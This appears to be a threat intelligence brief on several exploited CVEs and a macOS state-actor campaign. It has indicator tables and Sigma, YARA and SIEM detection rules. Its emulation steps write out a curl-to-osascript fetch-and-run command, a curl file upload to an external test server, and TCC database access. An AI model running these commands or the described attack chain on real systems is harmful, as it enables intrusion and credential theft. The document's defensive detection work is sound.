Reflective loading — icloudz: Uses NSCreateObjectFileImageFromMemory API to load Mach-O payloads from C2 into memory. No file written to disk. Defeats file-based detection and forensic artifact recovery.

CVE-2026-33824 — Windows IKE RCE (CVSS 9.8)

Attack vector: Network, unauthenticated, no user interaction required Mechanism: Crafted IKEv2 packets exploit a vulnerability in Windows IKE service extensions. Microsoft and ZDI describe potential wormability — a compromised host can propagate exploitation to adjacent IPSec-enabled Windows hosts automatically. Firewall mitigation (pre-patch): Block inbound UDP 500 and UDP 4500 from untrusted external sources. Does not protect against internal spread in already-compromised environments.

CVE-2026-32201 — SharePoint Server Spoofing (Zero-Day, Actively Exploited)

Root cause: Improper input validation in SharePoint Server CVSS: 6.5 | Network / No user interaction / Unauthorized attacker Impact: Network-based spoofing enabling unauthorized viewing or modification of sensitive SharePoint-hosted content. Microsoft confirms "Exploitation Detected" but has not publicly disclosed the exploitation chain.

CVE-2026-3909 / CVE-2026-3910 — Chrome Skia / V8 (CVSS 8.8)

CVE-2026-3909 (Skia): Out-of-bounds write triggered via crafted HTML rendering. Leads to memory corruption and arbitrary code execution within the renderer process.

CVE-2026-3910 (V8): Memory corruption in JavaScript/WebAssembly engine. Arbitrary code execution within browser sandbox. Both require only that a user visits a malicious webpage — no download, no install, no extension required. Google confirmed active exploitation at patch release.

Sapphire Sleet — Full IOC Table

Source: Microsoft Threat Intelligence (T1-03) — Verdict: Malicious (High Confidence)

Domains — C2 Infrastructure

uw04webzoom[.]us      C2 payload delivery — Stage 1–5 fetches
uw05webzoom[.]us      C2 payload delivery
uw03webzoom[.]us      C2 payload delivery
ur01webzoom[.]us      C2 payload delivery
uv01webzoom[.]us      C2 payload delivery
uv03webzoom[.]us      C2 payload delivery
uv04webzoom[.]us      C2 payload delivery
ux06webzoom[.]us      C2 payload delivery
check02id[.]com       com.google.chromes.updaters C2 (port 5202)

Pattern note: *.webzoom[.]us deliberately impersonates Zoom infrastructure naming. check02id[.]com is a separate registrar/naming cluster — possible infrastructure compartmentalization between primary and tertiary backdoors.

IP Addresses — C2 Infrastructure

188.227.196[.]252     C2 infrastructure
83.136.208[.]246      com.apple.cli C2 — port 6783
83.136.209[.]22       C2 infrastructure
83.136.208[.]48       C2 infrastructure
83.136.210[.]180      C2 infrastructure
104.145.210[.]107     C2 infrastructure

Network note: 83.136.208.0/22 hosts multiple C2 IPs — consider /22 range block at perimeter pending further investigation.

File Hashes — SHA-256

2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419
05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53
5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7
5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5
95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63
8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c
a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640

Filesystem Artifacts — Infection Markers

~/.zoom.log
  Infection marker — presence indicates prior compromise attempt

~/Library/Application Support/iCloud/icloudz
  icloudz backdoor binary (reflective loader)

~/Library/Google/com.google.chromes.updaters
  Tertiary backdoor binary (60s beacon loop, port 5202)

/Library/LaunchDaemons/com.google.webkit.service.plist
  Persistence LaunchDaemon — launches icloudz at boot

~/Library/Application Support/Authorization/auth.db
  services backdoor installation marker

/tmp/lg4err
  Error log artifact from services binary installation

/private/tmp/SystemUpdate/
  Staging directory for exfiltration archives

/private/tmp/SoftwareUpdate/
  Staging directory for decoy app

Campaign Artifacts (Published by Microsoft — Reference Only)

Upload authorization token : fwyan48umt1vimwqcqvhdd9u72a7qysi
Machine identifier example : 82cf5d92-87b5-4144-9a4e-6b58b714d599
curl user-agents (stage IDs): mac-cur1, mac-cur2, mac-cur3,
                               mac-cur4, mac-cur5, audio, beacon

Fortinet / Microsoft / Chrome — IOC Status

Fortinet CVE-2026-24858 / CVE-2026-21643 / CVE-2026-35616: [INSUFFICIENT SOURCE DATA] — No IP addresses, domains, file hashes, or actor-linked infrastructure published in available sources. Exploitation confirmed via CISA KEV and Fortinet PSIRT; actor IOCs not publicly released.

Apache ActiveMQ CVE-2026-34197: [INSUFFICIENT SOURCE DATA] — CISA KEV confirms in-the-wild exploitation; no actor-attributed C2 infrastructure or file IOCs published at time of this report.

Chrome CVE-2026-3909 / CVE-2026-3910: [INSUFFICIENT SOURCE DATA] — Google and CISA confirm active exploitation; no campaign-specific IOCs published.

Sapphire Sleet macOS — Detection Engineering

Immediate priority: Deploy all rules below within 24 hours on macOS endpoints.

SIGMA Pseudocode — Rule 1: Suspicious osascript Spawning curl

title: Sapphire Sleet - osascript Spawning curl with Piped Execution
id: SS-MAC-001
status: experimental
description: >
  Detects osascript spawning curl and piping result back to osascript
  — core execution pattern of Sapphire Sleet macOS payload chain.
  Legitimate software does not chain curl output into osascript execution.
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentProcessName|endswith: 'osascript'
  selection_child:
    ProcessName|endswith: 'curl'
  selection_args:
    CommandLine|contains|any:
      - 'run script result'
      - '| osascript'
      - 'do shell script'
  condition: (selection_parent and selection_child) or selection_args
falsepositives:
  - Legitimate automation scripts using osascript with curl (rare in enterprise)
level: high
tags

SIGMA Pseudocode — Rule 2: Sapphire Sleet Campaign User-Agents

title: Sapphire Sleet - Campaign Stage-Tracking curl User-Agents
id: SS-MAC-002
status: experimental
description: >
  Detects curl requests using Sapphire Sleet campaign user-agents
  mac-cur1 through mac-cur5, 'audio', and 'beacon'. These strings
  are stage-tracking identifiers embedded in the actor's payload chain.
  No legitimate software uses these user-agent strings.
logsource:
  category: network
  product: macos
detection:
  selection:
    CommandLine|contains|any:
      - '-A mac-cur1'
      - '-A mac-cur2'
      - '-A mac-cur3'
      - '-A mac-cur4'
      - '-A mac-cur5'
      - '-A audio'
      - '-A beacon'
  condition: selection
falsepositives:
  - None expected
level: critical
tags

SIGMA Pseudocode — Rule 3: Unsigned LaunchDaemon with Vendor-Impersonating Name

title: Sapphire Sleet - Suspicious LaunchDaemon Creation
id: SS-MAC-003
status: experimental
description: >
  Detects creation of LaunchDaemon plist files with com.google.* or
  com.apple.* naming pattern where the creating process is not signed
  by Apple Inc. or Google LLC. Sapphire Sleet installs persistence
  via com.google.webkit.service.plist masquerading as a Google service.
logsource:
  category: file_event
  product: macos
detection:
  selection:
    TargetFilename|startswith:
      - '/Library/LaunchDaemons/com.google.'
      - '/Library/LaunchDaemons/com.apple.'
    EventType: 'FileCreate'
  filter_legitimate:
    SignatureStatus: 'signed'
    SignerName|contains|any:
      - 'Apple Inc.'
      - 'Google LLC'
  condition: selection and not filter_legitimate
falsepositives:
  - Legitimate Google or Apple software installers (filtered by signature check)
level: critical
tags

SIGMA Pseudocode — Rule 4: TCC Database Modification

title: Sapphire Sleet - TCC.db Modification via sqlite3
id: SS-MAC-004
status: experimental
description: >
  Detects sqlite3 modifying the macOS TCC database — the core
  mechanism used by Sapphire Sleet to grant osascript AppleEvents
  permissions without user consent. Direct TCC.db modification
  by non-system processes is anomalous.
logsource:
  category: file_event
  product: macos
detection:
  selection_file:
    TargetFilename|endswith: '/com.apple.TCC/TCC.db'
    EventType|in:
      - 'FileModify'
      - 'FileCreate'
  selection_process:
    ProcessName|endswith: 'sqlite3'
  filter_system:
    ProcessPath|startswith:
      - '/System/Library/'
      - '/usr/libexec/'
  condition: (selection_file and selection_process) and not filter_system
falsepositives:
  - Rare legitimate system operations; validate against process lineage
level: critical
tags

SIGMA Pseudocode — Rule 5: dscl -authonly Credential Validation

title: Sapphire Sleet - Credential Validation via dscl authonly
id: SS-MAC-005
status: experimental
description: >
  Detects dscl invoked with -authonly flag from a non-system process.
  Sapphire Sleet uses this to validate stolen credentials before
  exfiltration via Telegram Bot API. Legitimate use is rare outside
  of system authentication frameworks.
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    ProcessName|endswith: 'dscl'
    CommandLine|contains: '-authonly'
  filter_system:
    ParentProcessPath|startswith:
      - '/System/'
      - '/usr/sbin/'
  condition: selection and not filter_system
falsepositives:
  - Some enterprise MDM or identity tools (validate against known-good list)
level: high
tags

YARA Pattern — Sapphire Sleet Campaign Artifact Detection

rule Sapphire_Sleet_macOS_Campaign_Artifacts {
  meta:
    description = "Detects Sapphire Sleet macOS campaign user-agents and C2 patterns"
    author      = "CTI Daily Brief 2026-04-17"
    source      = "Microsoft Threat Intelligence (T1-03)"
    date        = "2026-04-17"
    confidence  = "high"
    tlp         = "white"

  strings:
    $ua1 = "mac-cur1" ascii
    $ua2 = "mac-cur2" ascii
    $ua3 = "mac-cur3" ascii
    $ua4 = "mac-cur4" ascii
    $ua5 = "mac-cur5" ascii

    $c2a = "webzoom.us" ascii nocase
    $c2b = "check02id.com" ascii nocase

    $token = "fwyan48umt1vimwqcqvhdd9u72a7qysi" ascii

    $path1 = "com.google.webkit.service.plist" ascii
    $path2 = "com.google.chromes.updaters" ascii
    $path3 = "icloudz" ascii

    $tcc = "kTCCServiceAppleEvents" ascii
    $tcc2 = "NSCreateObjectFileImageFromMemory" ascii

  condition:
    2 of ($ua*) or
    any of ($c2*) or
    $token or
    2 of ($path*) or
    ($tcc and $tcc2)
}

SIEM Field Logic — Network Monitoring

ALERT: Sapphire Sleet C2 Communication
  IF dns.query.name MATCHES "*.webzoom.us" OR "check02id.com"
  → Severity: CRITICAL | Tag: sapphire_sleet_c2

ALERT: Sapphire Sleet Exfiltration Port
  IF network.destination.port == 8443
  AND network.source.device.os == "macOS"
  AND network.destination.ip NOT IN [approved_saas_ranges]
  → Severity: HIGH | Tag: suspicious_exfil_macos

ALERT: Telegram Bot API from macOS Endpoint
  IF http.request.uri CONTAINS "api.telegram.org/bot"
  AND network.source.device.os == "macOS"
  AND process.name NOT IN ["approved_telegram_clients"]
  → Severity: HIGH | Tag: credential_exfil_telegram

ALERT: Suspicious Outbound Port 5202
  IF network.destination.port == 5202
  AND network.source.device.type == "workstation"
  → Severity: HIGH | Tag: sapphire_sleet_tertiary_c2

Apache ActiveMQ CVE-2026-34197 — Detection Engineering

SIGMA Pseudocode — Rule 6: Jolokia Exploitation Attempt

title: CVE-2026-34197 - ActiveMQ Jolokia RCE Attempt
id: AMQ-001
status: experimental
description: >
  Detects POST requests to Apache ActiveMQ Jolokia JMX-HTTP bridge
  containing known exploitation methods for CVE-2026-34197.
  addNetworkConnector and addConnector with brokerConfig parameter
  are the primary exploitation vectors. No legitimate Jolokia usage
  should contain remote URI references in brokerConfig.
logsource:
  category: webserver
  product: activemq
detection:
  selection_method:
    http.request.method: 'POST'
    http.request.uri|contains: '/api/jolokia/'
  selection_payload:
    http.request.body|contains|any:
      - 'addNetworkConnector'
      - 'addConnector'
  selection_config:
    http.request.body|contains: 'brokerConfig'
  selection_remote:
    http.request.body|contains|any:
      - 'http://'
      - 'https://'
      - 'xbean:'
  condition: selection_method and selection_payload and
             (selection_config or selection_remote)
falsepositives:
  - Legitimate broker network configuration changes via Jolokia (extremely rare)
level: critical
tags

SIEM Field Logic — ActiveMQ Network Monitoring

ALERT: Unauthorized Jolokia Access
  IF http.request.uri CONTAINS "/api/jolokia/"
  AND network.source.ip NOT IN [approved_management_subnets]
  AND network.destination.port IN [8161, 8162]
  → Severity: HIGH

ALERT: ActiveMQ Process Spawning Shell
  IF process.parent.name IN ["activemq", "java"]
  AND process.name IN ["bash", "sh", "cmd.exe", "powershell.exe"]
  → Severity: CRITICAL | Tag: activemq_rce_confirmed
  (This indicates successful exploitation — treat as active incident)

ALERT: ActiveMQ Outbound to External Host
  IF process.parent.name IN ["activemq", "java"]
  AND network.destination.ip NOT IN [approved_activemq_peers]
  AND network.direction == "outbound"
  → Severity: HIGH | Tag: possible_activemq_c2_callback

YARA Pattern — ActiveMQ Jolokia Exploitation Log Scan

rule ActiveMQ_Jolokia_CVE_2026_34197 {
  meta:
    description = "Detects CVE-2026-34197 exploitation attempts in ActiveMQ logs"
    cve         = "CVE-2026-34197"
    cvss        = "8.8"
    date        = "2026-04-17"
    confidence  = "high"

  strings:
    $jolokia    = "/api/jolokia/" ascii
    $add_net    = "addNetworkConnector" ascii
    $add_con    = "addConnector" ascii
    $broker_cfg = "brokerConfig" ascii
    $xbean      = "xbean:" ascii
    $spring_ctx = "ResourceXmlApplicationContext" ascii
    $runtime    = "Runtime.exec" ascii

  condition:
    ($jolokia and ($add_net or $add_con)) or
    ($jolokia and $broker_cfg) or
    $spring_ctx or
    $xbean
}

Fortinet FortiCloud SSO — Detection Engineering

SIEM Pseudocode — Rule 7: Anomalous SSO Admin Account Creation

ALERT: New Fortinet Admin Account via SSO from Rare Source
  IF event.source IN ["fortios_auth", "fortimanager_audit"]
  AND event.action == "admin_account_created"
  AND event.auth_method == "FortiCloud_SSO"
  AND source.ip NOT IN [known_admin_source_ips]
  WITHIN 300 seconds of a FortiCloud SSO login event
  → Severity: CRITICAL
  Tag: fortinet_rogue_admin_creation
  Note: Treat as presumed CVE-2026-24858 exploitation pending investigation

ALERT: FortiCloud SSO Login from New ASN
  IF event.source IN ["fortios_auth", "fortimanager_audit"]
  AND event.action == "sso_login_success"
  AND source.asn NOT IN [historically_seen_admin_asns]
  → Severity: HIGH
  Tag: fortinet_sso_rare_asn

Threat hunting hypothesis — retroactive (January–April 2026): Query Fortinet admin event logs from 2026-01-15 onward for:

Admin accounts created via FortiCloud SSO sessions
Configuration changes (firewall rules, routing, VPN) made within 60 minutes of an SSO login from a previously unseen source IP
Any admin account created that does not correspond to a known team member in your IAM system

Windows IKE / TCP/IP — Detection Engineering

SIEM Pseudocode — Rule 8: IKE Traffic Anomaly

ALERT: High-Volume IKE Negotiation from Single Source
  IF network.protocol IN ["IKE", "IKEv2"]
  AND network.destination.port IN [500, 4500]
  AND COUNT(network.source.ip) > 50 per 60 seconds
  → Severity: HIGH
  Tag: possible_cve_2026_33824_probe

ALERT: Windows IKE Service Crash
  IF windows.event.id == 7034
  AND windows.service.name CONTAINS "ikeext"
  → Severity: HIGH
  Tag: ike_service_instability_post_external_traffic

Chrome CVE-2026-3909 / CVE-2026-3910 — Detection Engineering

EDR Pseudocode — Rule 9: Suspicious Chrome Child Process

ALERT: Suspicious Shell Spawned from Chrome
  IF process.parent.name IN ["chrome.exe", "chromium.exe", "brave.exe"]
  AND process.name IN ["cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "bash", "sh"]
  AND time_since_parent_crash < 30 seconds
  → Severity: CRITICAL
  Tag: possible_chrome_rce_exploitation

ALERT: Chrome Process Memory Anomaly
  IF process.name IN ["chrome.exe", "chromium.exe"]
  AND process.memory_anomaly == true
  AND process.spawned_child == true
  → Severity: HIGH
  Tag: browser_sandbox_escape_indicator

ID	Technique	Sub-Technique	Cluster	Source Basis
T1566	Phishing	Via Service (LinkedIn)	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1204.002	User Execution	Malicious File (.scpt)	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1059.002	Command & Scripting	AppleScript	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1562.001	Impair Defenses	TCC Database Modification	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1055	Process Injection	Reflective Mach-O Loading	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1056.002	Input Capture	GUI Input Capture	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1555.001	Credential Stores	Keychain	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1539	Steal Web Session Cookie	—	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1547.011	Autostart Execution	Plist Modification	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1041	Exfiltration Over C2	—	Sapphire Sleet	Microsoft T1-03 (source-confirmed)
T1190	Exploit Public-Facing App	—	ActiveMQ CVE-2026-34197	CISA KEV + THN (behavior-inferred; stated basis: Jolokia API exploitation)
T1078	Valid Accounts	—	Fortinet CVE-2026-24858	Fortinet PSIRT / The Record (behavior-inferred; stated basis: rogue admin account creation via SSO)
T1059.003	Command & Scripting	Windows Command Shell	Fortinet EMS CVE-2026-21643	CISA KEV (behavior-inferred from SQL injection → command execution)

MITRE D3FEND — Recommended Countermeasures:

D3FEND ID	Countermeasure	Applies To
D3-EAL	Executable Allowlisting	Block unsigned/internet-sourced Mach-O + .scpt on macOS
D3-NTF	Network Traffic Filtering	Block *.webzoom.us, check02id.com, known C2 IP ranges
D3-UAP	User Account Permissions	Restrict Jolokia API; enforce non-default ActiveMQ credentials
D3-SYSM	System Call Analysis	Alert on NSCreateObjectFileImageFromMemory from non-Apple processes
D3-CE	Credential Hardening	Replace admin:admin on all ActiveMQ deployments; audit Fortinet admin accounts
D3-ORA	Operating System API	Monitor sqlite3 access to TCC.db from non-system processes

Chapter 05 - Governance, Risk & Compliance

Regulatory Exposure by Cluster

Fortinet FortiCloud SSO / EMS (CVE-2026-24858, CVE-2026-21643, CVE-2026-35616)

GDPR / EU NIS2: If a FortiCloud SSO compromise resulted in unauthorized access to systems processing EU personal data, organizations face potential breach-notification obligations under Article 33 GDPR (72-hour notification window from awareness) and NIS2 incident reporting requirements. MSPs and MSSPs face heightened NIS2 exposure given supply chain obligations.
India DPDP Act: Organizations processing personal data of Indian residents on networks protected by compromised Fortinet infrastructure must assess whether data confidentiality was affected — notification obligations apply.
US FCEB / BOD 22-01: CVE-2026-21643 FCEB deadline passed April 16, 2026. Non-compliant federal agencies and contractors are in documented breach of BOD 22-01. Document remediation status and escalate to CISO and counsel.
HIPAA / PCI-DSS: Compromise of firewall management platforms protecting ePHI or cardholder data environments triggers breach investigation obligations and potential mandatory reporting to HHS or card brands.

Microsoft Patch Tuesday (CVE-2026-32201, CVE-2026-33824, CVE-2023-21529)

SOX / SEC Cyber Disclosure Rule: US-listed companies that experience material impacts from these exploited vulnerabilities may need to evaluate disclosure obligations under SEC's cybersecurity incident reporting rule. The Exchange/Medusa ransomware link (Storm-1175) is particularly relevant given ransomware's materiality precedents.
GDPR / NIS2: Exploitation of SharePoint spoofing flaw in environments hosting personal data may constitute a personal data breach requiring notification.
FCEB / BOD 22-01: CVE-2026-32201 and CVE-2023-21529 carry April 27, 2026 FCEB remediation deadlines. Non-compliance from today is a governance gap.

Apache ActiveMQ CVE-2026-34197

FCEB / BOD 22-01: FCEB patch deadline April 30, 2026. Federal agencies and contractors must document compliance.
GDPR / NIS2 / HIPAA: ActiveMQ is embedded in many data pipeline and integration architectures. Exploitation could expose data transiting the broker — assess whether PII, PHI, or financial data passes through ActiveMQ instances in scope.
Data pipeline risk: Many organizations are unaware that ActiveMQ runs in their environment — it is frequently a transitive dependency of middleware frameworks. Asset discovery is a governance prerequisite here.

Sapphire Sleet macOS Campaign

GDPR / DPDP: Exfiltration of employee credentials, session tokens, and Apple Notes content likely constitutes a personal data breach. If any organizational data was captured in Apple Notes or browser sessions, this is a reportable incident in most jurisdictions.
Financial regulation (SEBI, FCA, SEC): For crypto, VC, and financial sector organizations, exfiltration of client data, trading credentials, or wallet keys may trigger mandatory notification under sector-specific financial regulation.
No recovery path: Organizations must communicate clearly to affected individuals that stolen cryptocurrency cannot be recovered. This is a qualitatively different risk from a password breach.

Board-Level Risk Summary

Today's risk picture is defined by five concurrent exploitation clusters spanning perimeter security infrastructure (Fortinet), enterprise collaboration and networking (Microsoft), enterprise messaging middleware (Apache ActiveMQ), endpoint browsers (Chrome), and a live DPRK state-actor campaign targeting cryptocurrency assets. The absence of a single named victim or headline breach should not create complacency — the CISA KEV listings confirm that exploitation is happening; the absence of victim reporting reflects reporting lag, not absence of impact.

Three questions for the board:

Have we confirmed that our Fortinet estate is patched and FortiCloud SSO audit has been completed for rogue accounts since January 2026?
Are our emergency patching SLAs for KEV-listed, actively exploited CVEs shorter than the CISA-mandated deadlines — or are we relying on federal deadlines as our de-facto patch schedule?
Do our employees in cryptocurrency, finance, and technology roles understand that a fake LinkedIn recruiter message is now a credible nation-state attack vector — and do our macOS endpoints have the controls in place to detect it?

CISO decision framework:

Escalate Fortinet remediation and log review as a board-visible risk program where Fortinet gear protects critical or regulated services
Approve emergency change windows for SharePoint, Windows IKE, and Exchange this weekend — do not defer to the next scheduled maintenance cycle
Mandate that asset discovery includes ActiveMQ instances in all middleware and integration environments before April 30 deadline
Issue targeted employee security awareness communication for macOS users in cryptocurrency and finance roles within 24 hours

Chapter 06 - Adversary Emulation

Emulation Scenario A — Sapphire Sleet macOS: Social Engineering to Full Compromise

Objective: Validate macOS endpoint detection coverage against Sapphire Sleet TTPs before the actor reaches production environments.

Prerequisites: macOS test endpoint with EDR deployed; SIEM receiving endpoint telemetry; isolated network segment; approved change control.

Emulation steps (controlled environment only):

Initial Access (T1204.002 + T1059.002): Create a benign .scpt file with quarantine attribute set (xattr -w com.apple.quarantine "0083;..." test.scpt). Open in Script Editor. Validate: Does your EDR alert on Script Editor spawning child processes with network connectivity? Does your SIEM Rule SS-MAC-001 fire?
C2 Simulation (T1059.002): Execute curl -A "mac-cur1" http://your-test-server/stage1.txt | osascript from a test terminal. Validate: Does SIEM Rule SS-MAC-002 trigger on the mac-cur1 user-agent? Does your proxy/DNS logging capture the request?
Persistence simulation (T1547.011): Create a test plist at /Library/LaunchDaemons/com.google.webkit.testonly.plist from a non-Apple-signed process. Validate: Does SIEM Rule SS-MAC-003 fire? Is the LaunchDaemon creation logged in your EDR?
TCC.db access simulation (T1562.001): Execute sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db ".tables" from a test process. Validate: Does SIEM Rule SS-MAC-004 detect the access?
Credential validation simulation (T1056.002): Execute dscl . -authonly testuser wrongpassword from a non-system process. Validate: Does SIEM Rule SS-MAC-005 trigger?
Exfiltration simulation (T1041): Create a test ZIP file and attempt upload to a test server on port 8443 using curl with --upload-file. Validate: Does your DLP or network monitoring alert on compressed file upload to non-approved external host?

Expected detection coverage if rules are deployed: Rules SS-MAC-001 through SS-MAC-005 should fire on steps 1–5. Network rules should fire on steps 2 and 6. Gap expected: TCC.db modification (step 4) may not be captured if your EDR does not have file event monitoring enabled for that path.

Emulation Scenario B — CVE-2026-34197: ActiveMQ Jolokia Exploitation

Objective: Validate detection of Jolokia API abuse before real exploitation.

Prerequisites: Lab ActiveMQ instance (never production); WAF/web proxy with logging; SIEM receiving web server logs.

Emulation steps:

Send a POST request to /api/jolokia/ on the lab instance with addConnector in the body (do not include a real remote URI — use a loopback address). Validate: Does SIEM Rule AMQ-001 fire?
From the lab instance's process context, execute a benign command (e.g., touch /tmp/test_rce_emulation). Validate: Does your EDR alert on the Java/ActiveMQ process spawning a child shell?
Attempt a login to the lab ActiveMQ console using admin:admin. Validate: Does your credential monitoring alert on default credential use?

Expected gap: Most environments do not have WAF coverage on internal ActiveMQ instances. This emulation will frequently reveal that Jolokia exploitation would be completely undetected — treat as a priority detection gap if confirmed.

Emulation Scenario C — Fortinet FortiCloud SSO: Admin Account Audit

Objective: Validate retrospective detection capability for CVE-2026-24858.

This is not active red team — it is a detection audit:

Query your SIEM/log management for all Fortinet admin account creation events from January 15, 2026 to present.
Cross-reference each account creation against your IAM system (AD, LDAP, or identity provider) — any account not matching a known team member is a finding.
For each SSO-sourced admin login in the same period, validate the source IP against your known admin IP allow-list — any unrecognized source IP is a finding requiring investigation.
If findings exist: treat as a potential CVE-2026-24858 exploitation incident and escalate to IR.

Intelligence Confidence84%

Score: 84 / 100

Contributing factors (positive):
+ Microsoft Threat Intelligence (T1-03, elevated) published full primary
  disclosure for Sapphire Sleet with IOCs, attack chain, and KQL queries
  — highest single-source confidence available (weight: +20)
+ CISA KEV listings (T1-08, authoritative) for CVE-2026-34197, CVE-2026-21643,
  CVE-2026-32201, CVE-2026-3909, CVE-2026-3910 — exploitation confirmed
  by U.S. government authority (weight: +18)
+ ZDI April 2026 Patch Tuesday review (T1-19, elevated) corroborates
  Microsoft CVE details independently (weight: +8)
+ Fortinet PSIRT advisory corroborated by Help Net Security, SOC Prime,
  and Shadowserver telemetry — multiple independent sources (weight: +10)
+ Google GTIG corroboration of Sapphire Sleet npm incident (T1-06,
  elevated) — strengthens actor attribution (weight: +8)
+ 13 total sources; cross-cluster corroboration across T1 and T2 tiers

Contributing factors (negative):
- No public IOCs for Fortinet EMS/SSO, ActiveMQ, or Chrome clusters
  — exploitation confirmed but tracking/attribution not possible (-6)
- Fortinet/ActiveMQ/Chrome actor attribution: Unattributed (-4)
- Sapphire Sleet campaign start date not confirmed in sources (-2)
- Storm-1175/Exchange attribution: single-source Microsoft; T2
  corroboration is secondary confirmation only (-2)